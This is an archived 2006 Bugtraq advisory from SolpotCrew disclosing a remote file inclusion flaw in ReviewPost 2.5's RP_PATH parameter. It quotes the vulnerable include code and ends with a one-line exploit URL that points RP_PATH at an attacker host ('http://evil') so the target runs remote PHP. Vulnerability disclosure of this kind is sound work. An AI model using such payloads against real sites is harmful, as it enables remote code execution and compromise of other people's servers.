[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SolpotCrew Advisory #11 - ReviewPost 2.5 (RP_PATH) Remote File Inclusion
- From: bius@xxxxxxx
- Date: 15 Sep 2006 17:01:25 -0000
#############################Solpot Crew Community##############################
# ReviewPost 2.5 (RP_PATH) Remote File Inclusion
# Donwload File : http://3-bius.com/ReviewPost.zip
# Bug Found By :home_edition2001 a.k.a (bius) (15-09-2006)
# contact: bius@xxxxxxx
# Website : http://www.nyubicrew.org/adv/home_edition2001-adv-01.txt
# Greetz: Solpot,Matdule,Fungky,psycho_l061c,rm_2online,ax[I]xu,can4da_dry
# imam26_it,ant1casper(tolong tambahin ya)
# #nyubi , #hitamputih @dalnet
# and all member solpotcrew community
# http://www.nyubicrew.org/forum/
# especially thx to Solpot @ nyubi@xxxxxxx
Input passed to the "RP_PATH" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from index.php
require "pp-inc.php";
if ( is_numeric($argv[0]) ) {
require "$RP_PATH/languages/$rplang/index.php";
require "$RP_PATH/login-inc.php";
if ( file_exists("install.php") ||
file_exists("{$Globals['maindir']}/install.php") ) {
diewell( "For security reasons, please remove the install.php from the
ReviewPost directory before proceeding." );
nb : others file has vulnerable too :)
exploit : http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil